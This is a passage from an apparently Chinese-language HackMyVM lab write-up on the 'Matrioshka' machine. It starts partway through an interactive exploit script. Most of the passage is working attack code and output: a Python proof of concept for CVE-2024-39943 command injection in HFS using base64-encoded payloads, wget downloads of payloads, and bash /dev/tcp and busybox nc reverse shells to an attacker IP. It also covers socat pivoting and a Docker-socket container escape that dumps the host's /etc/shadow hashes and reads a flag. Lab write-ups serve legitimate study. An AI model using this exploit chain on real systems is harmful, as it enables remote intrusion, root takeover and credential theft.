print("="*50)
52

53
while True:
54
    cmd = input("\n> ").strip().lower()
55

56
    if cmd in ["1", "download"]:
57
        exec_cmd(f"wget http://{reverse_ip}:{http_port}/reverse_shell.sh -O /tmp/reverse_shell.sh")
58

59
    elif cmd in ["2", "shell"]:
60
        exec_cmd("bash /tmp/reverse_shell.sh")
61

62
    elif cmd in ["3", "custom"]:
63
        custom = input("Enter command: ")
64
        exec_cmd(custom)
65

66
    elif cmd == "help":
67
        print(f"""
68
在matrioshka主机上执行:
69

70
1. 创建reverse_shell.sh:
71
   echo '#!/bin/bash' > /tmp/reverse_shell.sh
72
   echo 'bash -i >& /dev/tcp/{reverse_ip}/{reverse_port} 0>&1' >> /tmp/reverse_shell.sh
73

74
2. 启动HTTP服务:
75
   cd /tmp && python3 -m http.server {http_port} --bind {reverse_ip}
76

77
3. 启动监听:
78
   nc -lvnp {reverse_port}
79
""")
80

81
    elif cmd == "exit":
82
        print("Bye!")
83
        break
84

85
    else:
86
        print("Unknown command. Type: 1/download, 2/shell, 3/custom, help, exit")

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/CVE-2024-39943-Poc-main]
2
└─# python new_poc.py
3
Url [http://127.0.0.1:7777/]: http://127.0.0.1:7777/
4
Cookie: hfs_http=eyJ1c2VybmFtZSI6ImFkbWluIiwiaXAiOiIxNzIuMTkuMC4xIiwiX2V4cGlyZSI6MTc2OTMxMjA4NjQ3MiwiX21heEFnZSI6ODY0MDAwMDB9; hfs_http.sig=oBLe_QpYLCtfwWMDMUMpGguRhuw
5
Reverse IP [172.17.0.1]: 172.19.0.1
6
Reverse Port [4444]: 4444
7
HTTP Port [8888]: 8000
8

9
==================================================
10
HFS RCE Interactive Shell
11
==================================================
12
Commands:
13
  1 or download  - 下载reverse_shell.sh
14
  2 or shell     - 执行反弹shell
15
  3 or custom    - 执行自定义命令
16
  help           - 显示准备步骤
17
  exit           - 退出
18
==================================================
19

20
> 1
21
[+] Executed: wget http://172.19.0.1:8000/reverse_shell.sh -O /tmp/reverse_shell.sh
22

23
matrioshka@matrioshka:/tmp$ echo '#!/bin/bash' > /tmp/reverse_shell.sh
24
matrioshka@matrioshka:/tmp$ echo 'bash -i >& /dev/tcp/172.19.0.1/4444 0>&1' >> /tmp/reverse_shell.sh
25
matrioshka@matrioshka:/tmp$ python3 -m http.server 8000 --bind 172.19.0.1
26
Serving HTTP on 172.19.0.1 port 8000 (http://172.19.0.1:8000/) ...

修改poc

1
#!/usr/bin/env python3
2
"""
3
CVE-2024-39943 HFS RCE - Based on Working WP
4
"""
5
import requests as req
6
import base64
7
import urllib.parse
8

9
print("="*60)
10
print("CVE-2024-39943 HFS RCE Exploit")
11
print("="*60)
12

13
url = input("Url [http://127.0.0.1:7777/]: ") or "http://127.0.0.1:7777/"
14
cookie = input("Cookie: ")
15
reverse_ip = input("Reverse IP [172.19.0.1]: ") or "172.19.0.1"
16
reverse_port = input("Reverse Port [4444]: ") or "4444"
17

18
if not url.endswith("/"):
19
    url += "/"
20

21
headers = {"x-hfs-anti-csrf": "1", "Cookie": cookie}
22

23
# Step 1: 添加VFS
24
print("\n[*] Step 1: 添加 VFS /tmp")
25
r1 = req.post(url + "~/api/add_vfs", headers=headers,
26
              json={"parent": "/", "source": "/tmp"})
27
print(f"    Status: {r1.status_code}")
28

29
# Step 2: 设置权限
30
print("[*] Step 2: 设置 VFS 权限 (允许上传)")
31
r2 = req.post(url + "~/api/set_vfs", headers=headers, json={
32
    "uri": "/tmp/",
33
    "props": {
34
        "can_see": None, "can_read": None, "can_list": None,
35
        "can_upload": "*", "can_delete": None, "can_archive": None,
36
        "source": "/tmp", "name": "tmp", "type": "folder", "masks": None
37
    }
38
})
39
print(f"    Status: {r2.status_code}")
40

41
print("\n" + "="*60)
42
print("[!] 现在请通过HFS Web界面上传 busybox 到 /tmp/ 目录!")
43
print(f"    访问: {url}")
44
print("    1. 进入 /tmp/ 文件夹")
45
print("    2. 点击上传按钮")
46
print("    3. 上传 busybox 文件")
47
print("="*60)
48
input("\n上传完成后按 Enter 继续...")
49

50
# Step 3: 创建reverse shell并执行
51
print("\n[*] Step 3: 通过命令注入执行反弹shell")
52

53
# 直接用busybox nc反弹shell
54
command = f"/tmp/busybox nc {reverse_ip} {reverse_port} -e /bin/bash"
55
print(f"    Command: {command}")
56

57
cmd_b64 = base64.b64encode(command.encode('utf-8')).decode('utf-8')
58
payload = f'poc";python3 -c "import os;import base64;os.system(base64.b64decode(\'{cmd_b64}\'))"'
59

60
# 创建文件夹触发
61
r3 = req.post(url + "~/api/create_folder", headers=headers,
62
              json={"uri": "/tmp/", "name": payload})
63
print(f"    create_folder Status: {r3.status_code}")
64

65
# 执行
66
encoded_payload = urllib.parse.quote(payload)
67
r4 = req.get(url + f"~/api/get_ls?path=/tmp/{encoded_payload}", headers=headers)
68
print(f"    get_ls Status: {r4.status_code}")
69

70
print("\n" + "="*60)
71
print("[+] 完成! 检查你的监听器")
72
print(f"    监听命令: nc -lvnp {reverse_port}")
73
print("="*60)

订正

1
hfs_http.sig=f_Q0EvPGzGSWmyCQtHd_gplkGgg;hfs_http=eyJ1c2VybmFtZSI6ImFkbWluIiwiaXAiOiIxNzIuMTkuMC4xIiwiX2V4cGlyZSI6MTc2OTMzOTcyMjM2OSwiX21heEFnZSI6ODY0MDAwMDB9

运行poc后发现/tmp目录下创建文件

1
127.0.0.1:7777/~/api/get_ls?path=/tmp/poc";python3 -c "import os;import base64;os.system(base64.b64decode('d2dldCAxNzIuMTkuMC4xOjgwMDAvcmV2ZXJzZV9zaGVsbC5zaCAtTyAvdG1wL3Jldi5zaAo=
2
'))

bmNhdCAxNzIuMTkuMC4xIDQ0NDQgLWUgL2Jpbi9iYXNo为base64后的指令

直接访问即可执行

1
matrioshka@matrioshka:~$ python3 -m http.server
2
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

环境问题

ssh转发端口不好用啊

好奇怪按理来讲可以的

直接上传内网穿透工具吧

socat或者Ligolo

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/socat]
2
└─# tldr socat
3

4
  socat
5

6
  Multipurpose relay (SOcket CAT).
7
  More information: http://www.dest-unreach.org/socat/.
8

9
  - Listen to a port, wait for an incoming connection and transfer data to STDIO:
10
    sudo socat - TCP-LISTEN:8080,fork
11

12
  - Listen on a port using SSL and print to stdout:
13
    sudo socat OPENSSL-LISTEN:4433,reuseaddr,cert=./cert.pem,cafile=./ca.cert.pem,key=./key.pem,verify=0 STDOUT
14

15
  - Create a connection to a host and port, transfer data in STDIO to connected host:
16
    sudo socat - TCP4:www.example.com:80
17

18
  - Forward incoming data of a local port to another host and port:
19
    sudo socat TCP-LISTEN:80,fork TCP4:www.example.com:80
20

21
  - Send data with multicast routing scheme:
22
    echo "Hello Multicast" | socat - UDP4-DATAGRAM:224.0.0.1:5000
23

24
  - Receive data from a multicast:
25
    socat - UDP4-RECVFROM:5000

1
matrioshka@matrioshka:/tmp$ ./socat TCP-LISTEN:8000,fork TCP4:172.19.0.2:80 &
2
[1] 6455

总算成了

先用脚本跑一个，跑出这个文件

然后重命名这个base64代码

然后复制粘贴

1
192.168.0.105:8000/~/api/get_ls?path=/tmp/poc";python3 -c "import os;import base64;os.system(base64.b64decode('d2dldCAxNzIuMTkuMC4xOjgwMDEvcmV2ZXJzZV9zaGVsbC5zaCAtTyAvdG1wL3JldmVyc2Vfc2hlbGwuc2g='))

1
matrioshka@matrioshka:/tmp$ python3 -m http.server 8001
2
Serving HTTP on 0.0.0.0 port 8001 (http://0.0.0.0:8001/) ...
3
172.19.0.2 - - [24/Jan/2026 07:20:41] "GET /reverse_shell.sh HTTP/1.1" 200 -

成功读取

然后再执行

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/CVE-2024-39943-Poc-main]
2
└─# echo -n "bash /tmp/reverse_shell.sh"|base64
3

4
YmFzaCAvdG1wL3JldmVyc2Vfc2hlbGwuc2g=
5

6
matrioshka@matrioshka:/tmp$ cat reverse_shell.sh
7
#!/bin/bash
8
bash -i >& /dev/tcp/172.19.0.1/4444 0>&1
9

10
matrioshka@matrioshka:/tmp$ busybox nc -lp 4444
11
bash: cannot set terminal process group (1): Inappropriate ioctl for device
12
bash: no job control in this shell
13
root@78d6dd4e44f4:~/.hfs#

容器逃逸

1
root@78d6dd4e44f4:/# id
2
id
3
uid=0(root) gid=0(root) groups=0(root)
4
root@78d6dd4e44f4:/# env
5
env
6
HOSTNAME=78d6dd4e44f4
7
PWD=/
8
HOME=/root
9
LS_COLORS=
10
PKG_EXECPATH=/opt/hfs/hfs
11
LESSCLOSE=/usr/bin/lesspipe %s %s
12
LESSOPEN=| /usr/bin/lesspipe %s
13
SHLVL=2
14
LC_CTYPE=C.UTF-8
15
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
16
_=/usr/bin/env
17
OLDPWD=/root
18
root@78d6dd4e44f4:/# ip a
19
ip a
20
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
21
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
22
    inet 127.0.0.1/8 scope host lo
23
       valid_lft forever preferred_lft forever
24
13: eth0@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
25
    link/ether 02:42:ac:13:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
26
    inet 172.19.0.2/16 brd 172.19.255.255 scope global eth0
27
       valid_lft forever preferred_lft forever
28
root@78d6dd4e44f4:/# cat /proc/1/cgroup 2>/dev/null | head -20
29
cat /proc/1/cgroup 2>/dev/null | head -20
30
0::/
31
root@78d6dd4e44f4:/# capsh --print 2>/dev/null || cat /proc/self/status | grep Cap
32
<int 2>/dev/null || cat /proc/self/status | grep Cap
33
WARNING: libcap needs an update (cap=40 should have a name).
34
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep
35
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
36
Ambient set =
37
Securebits: 00/0x0/1'b0
38
 secure-noroot: no (unlocked)
39
 secure-no-suid-fixup: no (unlocked)
40
 secure-keep-caps: no (unlocked)
41
 secure-no-ambient-raise: no (unlocked)
42
uid=0(root) euid=0(root)
43
gid=0(root)
44
groups=0(root)
45
Guessed mode: UNCERTAIN (0)
46
root@78d6dd4e44f4:/# ls -la /var/run/docker.sock 2>/dev/null; ls -la /.dockerenv 2>/dev/null; ls -la /dev 2>/dev/null | head -30
47
<env 2>/dev/null; ls -la /dev 2>/dev/null | head -30
48
srw-rw---- 1 root 111 0 Jan 24 04:34 /var/run/docker.sock
49
-rwxr-xr-x 1 root root 0 Jan 24 04:35 /.dockerenv
50
total 4
51
drwxr-xr-x 5 root root  340 Jan 24 04:35 .
52
drwxr-xr-x 1 root root 4096 Jan 24 04:35 ..
53
lrwxrwxrwx 1 root root   11 Jan 24 04:35 core -> /proc/kcore
54
lrwxrwxrwx 1 root root   13 Jan 24 04:35 fd -> /proc/self/fd
55
crw-rw-rw- 1 root root 1, 7 Jan 24 04:35 full
56
drwxrwxrwt 2 root root   40 Jan 24 04:35 mqueue
57
crw-rw-rw- 1 root root 1, 3 Jan 24 04:35 null
58
lrwxrwxrwx 1 root root    8 Jan 24 04:35 ptmx -> pts/ptmx
59
drwxr-xr-x 2 root root    0 Jan 24 04:35 pts
60
crw-rw-rw- 1 root root 1, 8 Jan 24 04:35 random
61
drwxrwxrwt 2 root root   40 Jan 24 04:35 shm
62
lrwxrwxrwx 1 root root   15 Jan 24 04:35 stderr -> /proc/self/fd/2
63
lrwxrwxrwx 1 root root   15 Jan 24 04:35 stdin -> /proc/self/fd/0
64
lrwxrwxrwx 1 root root   15 Jan 24 04:35 stdout -> /proc/self/fd/1
65
crw-rw-rw- 1 root root 5, 0 Jan 24 04:35 tty
66
crw-rw-rw- 1 root root 1, 9 Jan 24 04:35 urandom
67
crw-rw-rw- 1 root root 1, 5 Jan 24 04:35 zero
68
root@78d6dd4e44f4:/# mount | grep -E "(docker|overlay|/dev/)" 2>/dev/null
69
mount | grep -E "(docker|overlay|/dev/)" 2>/dev/null
70
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/ZYCUXWQ2DAAJWEPJDKLO2JXP66:/var/lib/docker/overlay2/l/XYIUP7CXNA67TCTVYSDXIXLC2O,upperdir=/var/lib/docker/overlay2/1788c5b2eb9e9c043c6724165957edfa39599e9a314bd00c4d9deb6d058f2276/diff,workdir=/var/lib/docker/overlay2/1788c5b2eb9e9c043c6724165957edfa39599e9a314bd00c4d9deb6d058f2276/work)
71
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
72
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
73
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k,inode64)
74
/dev/sda1 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro)
75
/dev/sda1 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro)
76
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro)
77
/dev/sda1 on /opt/hfs/hfs-linux.zip type ext4 (rw,relatime,errors=remount-ro)
78
tmpfs on /run/docker.sock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=201428k,mode=755,inode64)
79
/dev/sda1 on /opt/hfs/config.yaml type ext4 (rw,relatime,errors=remount-ro)
80
/dev/sda1 on /opt/hfs/data type ext4 (rw,relatime,errors=remount-ro)
81
root@78d6dd4e44f4:/# fdisk -l 2>/dev/null || lsblk 2>/dev/null
82
fdisk -l 2>/dev/null || lsblk 2>/dev/null
83
root@78d6dd4e44f4:/# uname -a; cat /etc/os-release 2>/dev/null | head -5
84
uname -a; cat /etc/os-release 2>/dev/null | head -5
85
Linux 78d6dd4e44f4 6.1.0-23-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15) x86_64 x86_64 x86_64 GNU/Linux
86
NAME="Ubuntu"
87
VERSION="20.04.6 LTS (Focal Fossa)"
88
ID=ubuntu
89
ID_LIKE=debian
90
PRETTY_NAME="Ubuntu 20.04.6 LTS"
91
root@78d6dd4e44f4:/#

发现 Docker Socket 可访问！这是最直接的逃逸路径。

1
 root@78d6dd4e44f4:/# docker images
2
  docker images
3
  REPOSITORY   TAG       IMAGE ID       CREATED         SIZE
4
  ubuntu       20.04     9df6d6105df2   17 months ago   72.8MB
5
  wordpress    latest    e826d932809c   18 months ago   686MB
6
  mysql        8.0.0     228d71078f8c   8 years ago     433MB

● 有本地镜像，用 ubuntu:20.04：

1
docker run -d -v /:/host --privileged --pid=host --name pwn ubuntu:20.04 sleep infinity && docker exec pwn chroot /host cat /etc/shadow
2
docker run -v /:/mnt --rm ubuntu:20.04 chroot /mnt cat /root/root.txt

1
root@78d6dd4e44f4:~/.hfs# docker exec pwn chroot /host cat /etc/shadow
2
docker exec pwn chroot /host cat /etc/shadow
3
root:$y$j9T$.ZHYtx4yIoOs49Rup3HPC1$U2xdQY0N6Qf5frOTNdUHlidiARPMaFXmbqYebm9XJcC:19957:0:99999:7:::
4
daemon:*:19956:0:99999:7:::
5
bin:*:19956:0:99999:7:::
6
sys:*:19956:0:99999:7:::
7
sync:*:19956:0:99999:7:::
8
games:*:19956:0:99999:7:::
9
man:*:19956:0:99999:7:::
10
lp:*:19956:0:99999:7:::
11
mail:*:19956:0:99999:7:::
12
news:*:19956:0:99999:7:::
13
uucp:*:19956:0:99999:7:::
14
proxy:*:19956:0:99999:7:::
15
www-data:*:19956:0:99999:7:::
16
backup:*:19956:0:99999:7:::
17
list:*:19956:0:99999:7:::
18
irc:*:19956:0:99999:7:::
19
_apt:*:19956:0:99999:7:::
20
nobody:*:19956:0:99999:7:::
21
systemd-network:!*:19956::::::
22
messagebus:!:19956::::::
23
avahi-autoipd:!:19956::::::
24
matrioshka:$y$j9T$pyr6bkZZRReL0Ect1iH4J0$ormtnhlW02niDkuRnoYJyXwv7DsX02xiU/HPZsuKFMB:20477:0:99999:7:::
25
sshd:!:19956::::::
26

27
root@78d6dd4e44f4:~/.hfs# docker run -v /:/mnt --rm ubuntu:20.04 chroot /mnt cat /root/root.txt
28
<nt --rm ubuntu:20.04 chroot /mnt cat /root/root.txt
29
7f5d6dbbaff0a1fc6d2a5c9160362908

docker逃逸原理介绍● Docker Socket 逃逸原理详解

逃逸前提条件

容器内可访问 Docker Socket (/var/run/docker.sock)
有权限与 Docker Daemon 通信（当前用户是 root 或在 docker 组）
有可用的本地镜像（或网络可拉取镜像）

为什么能逃逸？

Docker Socket 是 Docker Daemon 的 API 接口。拥有它的访问权 = 拥有宿主机 root 权限，因为你可以：

创建特权容器
挂载宿主机任意目录
访问宿主机 PID 命名空间

命令详解

命令 1：完整特权逃逸

docker run -d -v /:/host —privileged —pid=host —name pwn ubuntu:20.04 sleep infinity
┌────────────────┬───────────────────────────────────────────────┐
│ 参数 │ 作用 │
├────────────────┼───────────────────────────────────────────────┤
│ docker run │ 创建并启动新容器 │
├────────────────┼───────────────────────────────────────────────┤
│ -d │ 后台运行（detach），不需要 TTY │
├────────────────┼───────────────────────────────────────────────┤
│ -v /:/host │ 关键：把宿主机根目录 / 挂载到容器的 /host │
├────────────────┼───────────────────────────────────────────────┤
│ —privileged │ 赋予容器所有 capabilities，可访问所有设备 │
├────────────────┼───────────────────────────────────────────────┤
│ —pid=host │ 共享宿主机 PID 命名空间，可看到宿主机所有进程 │
├────────────────┼───────────────────────────────────────────────┤
│ —name pwn │ 容器命名为 pwn，方便后续操作 │
├────────────────┼───────────────────────────────────────────────┤
│ ubuntu:20.04 │ 使用的镜像 │
├────────────────┼───────────────────────────────────────────────┤
│ sleep infinity │ 让容器保持运行不退出 │
└────────────────┴───────────────────────────────────────────────┘
然后：
docker exec pwn chroot /host cat /etc/shadow
┌─────────────────┬──────────────────────────────────────────┐
│ 参数 │ 作用 │
├─────────────────┼──────────────────────────────────────────┤
│ docker exec │ 在运行中的容器执行命令 │
├─────────────────┼──────────────────────────────────────────┤
│ pwn │ 目标容器名 │
├─────────────────┼──────────────────────────────────────────┤
│ chroot /host │ 关键：切换根目录到 /host（即宿主机的 /） │
├─────────────────┼──────────────────────────────────────────┤
│ cat /etc/shadow │ 此时读取的是宿主机的 /etc/shadow │
└─────────────────┴──────────────────────────────────────────┘

命令 2：一次性逃逸

docker run -v /:/mnt —rm ubuntu:20.04 chroot /mnt cat /root/root.txt
┌────────────────────┬─────────────────────────────────────┐
│ 参数 │ 作用 │
├────────────────────┼─────────────────────────────────────┤
│ docker run │ 创建并启动新容器 │
├────────────────────┼─────────────────────────────────────┤
│ -v /:/mnt │ 把宿主机根目录挂载到容器的 /mnt │
├────────────────────┼─────────────────────────────────────┤
│ —rm │ 命令执行完自动删除容器（不留痕迹） │
├────────────────────┼─────────────────────────────────────┤
│ ubuntu:20.04 │ 使用的镜像 │
├────────────────────┼─────────────────────────────────────┤
│ chroot /mnt │ 切换根目录到 /mnt（宿主机文件系统） │
├────────────────────┼─────────────────────────────────────┤
│ cat /root/root.txt │ 读取宿主机的 /root/root.txt │
└────────────────────┴─────────────────────────────────────┘

图示

┌─────────────────────────────────────────┐
│ 宿主机 (Host) │
│ / │
│ ├── etc/shadow │
│ ├── root/root.txt │
│ └── var/run/docker.sock ◄─────────┐ │
│ │ │
│ ┌─────────────────────────────┐ │ │
│ │ 当前容器 (你所在位置) │ │ │
│ │ 可访问 docker.sock ────────┘ │ │
│ │ │ │
│ │ docker run -v /:/mnt … │ │
│ │ │ │ │
│ │ ▼ │ │
│ │ ┌──────────────────┐ │ │
│ │ │ 新建容器 (pwn) │ │ │
│ │ │ /mnt ──► 宿主机/ │ │ │
│ │ │ chroot /mnt │ │ │
│ │ │ = 宿主机 root! │ │ │
│ │ └──────────────────┘ │ │
│ └─────────────────────────────┘ │ │
└─────────────────────────────────────────┘

总结

本质：通过 Docker Socket 创建一个挂载宿主机文件系统的新容器，然后用 chroot 切换到宿主机环境，实现逃逸。

Thanks for reading!

HMV-Matrioshka

Sat Jan 24 2026

1626 words · 6 minutes

Documentation Hackmyvm Hackmyvm Linux Machine Enumeration Privilege Escalation WordPress Docker SQL Injection XSS RCE Lateral Movement Password Attacks Command Injection File Upload

HMV-Matrioshka

信息收集

IP定位

rustscan扫描

目录扫描

Ultimate Member 2.8.6（关键点）

XML-RPC 开启

Wpscan扫描

漏洞利用

msfconsole

提权

上传恶意插件

提权-matrioshka

提权-root

查suid

sudo -l

监听端口

目标-Web 服务

9090 是 HFS 0.52.9（Rejetto 新版 Node.js 重写）

SSH 本地端口转发

CVE-2024-39943

为什么 ncat -e 不触发

修改后的 稳定版 PoC 结构（推荐）

✅ 思路

✅ 代码

1️⃣ 宿主真实网卡

2️⃣ Docker bridge（重点）

修改代码

修改poc

订正

环境问题

容器逃逸

docker逃逸原理介绍● Docker Socket 逃逸原理详解

HMV-Matrioshka

为什么 `ncat -e` 不触发

修改后的稳定版 PoC 结构（推荐）